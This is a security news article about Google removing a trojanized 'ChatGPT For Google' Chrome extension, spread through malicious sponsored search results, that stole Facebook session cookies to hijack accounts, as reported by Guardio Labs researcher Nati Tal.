Google has stepped in to remove a bogus Chrome browser extension from the official Web Store that masqueraded as OpenAI's ChatGPT service to harvest Facebook session cookies and hijack the accounts.
The "ChatGPT For Google" extension, a trojanized version of a legitimate open source browser add-on, attracted over 9,000 installations since March 14, 2023, prior to its removal. It was originally uploaded to the Chrome Web Store on February 14, 2023.
According to Guardio Labs researcher Nati Tal, the extension was propagated through malicious sponsored Google search results that were designed to redirect unsuspecting users searching for "Chat GPT-4" to fraudulent landing pages that point to the fake add-on.
Installing the extension adds the promised functionality – i.e., enhancing search engines with ChatGPT – but it also stealthily activates the ability to capture Facebook-related cookies and exfiltrate it to a remote server in an encrypted manner.
Once in possession of the victim's cookies, the threat actor moves to seize control of the Facebook account, change the password, alter the profile name and picture, and even use it to disseminate extremist propaganda.
The development makes it the second fake ChatGPT Chrome browser extension to be discovered in the wild. The other extension, which also functioned as a Facebook account stealer, was distributed via sponsored posts on the social media platform.
Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!Join the Session
If anything, the findings are yet another proof that cybercriminals are capable of swiftly adapting their campaigns to cash in on the popularity of ChatGPT to distribute malware and stage opportunistic attacks.
"For threat actors, the possibilities are endless — using your profile as a bot for comments, likes, and other promotional activities, or creating pages and advertisement accounts using your reputation and identity while promoting services that are both legitimate and probably mostly not," Tal said.